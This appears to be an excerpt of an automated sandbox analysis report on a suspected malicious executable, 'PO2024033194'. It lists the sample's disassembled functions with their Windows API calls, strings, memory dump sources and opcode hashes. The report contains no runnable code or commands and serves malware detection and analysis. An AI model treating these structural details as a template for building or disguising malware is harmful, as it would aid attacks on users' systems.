                                                                  • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                  • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                                  Function 00448D62 Relevance: 15.2, APIs: 10, Instructions: 174windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                  • SendMessageW.USER32(769523D0,00001001,00000000,?), ref: 00448E16
                                                                  • SendMessageW.USER32(769523D0,00001026,00000000,?), ref: 00448E25
                                                                    • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                  • String ID:
                                                                  • API String ID: 3771399671-0
                                                                  • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                  • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                                  • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                  • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                                  Function 00434621 Relevance: 15.1, APIs: 10, Instructions: 98threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                                  • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                  • String ID:
                                                                  • API String ID: 2156557900-0
                                                                  • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                  • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                                  • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                  • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                                                  Function 0046943F Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 287COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                  • API String ID: 0-1603158881
                                                                  • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                  • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                                  • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                  • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                                  Function 00401CB0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 240COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                                  • DestroyWindow.USER32(?), ref: 00426F50
                                                                  • UnregisterHotKey.USER32(?), ref: 00426F77
                                                                  • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                  • String ID: close all$#v
                                                                  • API String ID: 4174999648-3101823635
                                                                  • Opcode ID: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                                  • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                                  • Opcode Fuzzy Hash: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                                  • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                                  Function 004485CB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateMenu.USER32 ref: 00448603
                                                                  • SetMenu.USER32(?,00000000), ref: 00448613
                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                                  • IsMenu.USER32(?), ref: 004486AB
                                                                  • CreatePopupMenu.USER32 ref: 004486B5
                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                                  • DrawMenuBar.USER32 ref: 004486F5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                  • String ID: 0
                                                                  • API String ID: 161812096-4108050209
                                                                  • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                  • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                                  • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                  • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                                  Function 0047679F Relevance: 13.8, APIs: 9, Instructions: 307COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                                                  • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                                  • Opcode Fuzzy Hash: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                                                  • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                                  Function 004561DA Relevance: 13.7, APIs: 9, Instructions: 164COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                  • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                                                  • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                  • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                                                  Function 00453893 Relevance: 13.7, APIs: 9, Instructions: 158filestringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                    • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                                  • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                  • String ID:
                                                                  • API String ID: 978794511-0
                                                                  • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                  • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                                  • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                  • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                                  Function 00441165 Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                  • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                                  • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                  • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                                  Function 00432704 Relevance: 13.5, APIs: 9, Instructions: 42COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ClearVariant
                                                                  • String ID:
                                                                  • API String ID: 1473721057-0
                                                                  • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                  • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                                  • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                  • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                                  Function 0044F0B3 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 389COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove$_memcmp
                                                                  • String ID: '$\$h
                                                                  • API String ID: 2205784470-1303700344
                                                                  • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                  • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                                                  • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                  • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                                                  Function 0045EA0F Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 325timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                                  • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                                  • VariantClear.OLEAUT32 ref: 0045EA6D
                                                                  • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                                  • __swprintf.LIBCMT ref: 0045EC33
                                                                  • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                                  Strings
                                                                  • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                                  • String ID: %4d%02d%02d%02d%02d%02d
                                                                  • API String ID: 2441338619-1568723262
                                                                  • Opcode ID: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                                                  • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                                  • Opcode Fuzzy Hash: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                                                  • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                                                  Function 004091B0 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 324sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                                  • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                                  • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                                  • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                                  • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Interlocked$DecrementIncrement$Sleep
                                                                  • String ID: @COM_EVENTOBJ
                                                                  • API String ID: 327565842-2228938565
                                                                  • Opcode ID: 9e658ec2980077184a1632dd5c21727ba620fa2cdb3865c7e3de5124d93aa359
                                                                  • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                                  • Opcode Fuzzy Hash: 9e658ec2980077184a1632dd5c21727ba620fa2cdb3865c7e3de5124d93aa359
                                                                  • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                                  Function 0047025C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 288COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VariantClear.OLEAUT32(?), ref: 0047031B
                                                                  • VariantClear.OLEAUT32(?), ref: 0047044F
                                                                  • VariantInit.OLEAUT32(?), ref: 004704A3
                                                                  • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                                  • VariantClear.OLEAUT32(?), ref: 00470516
                                                                    • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                                  • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                                    • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                                  • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                                  • String ID: H
                                                                  • API String ID: 3613100350-2852464175
                                                                  • Opcode ID: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                                                  • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                                  • Opcode Fuzzy Hash: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                                                  • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
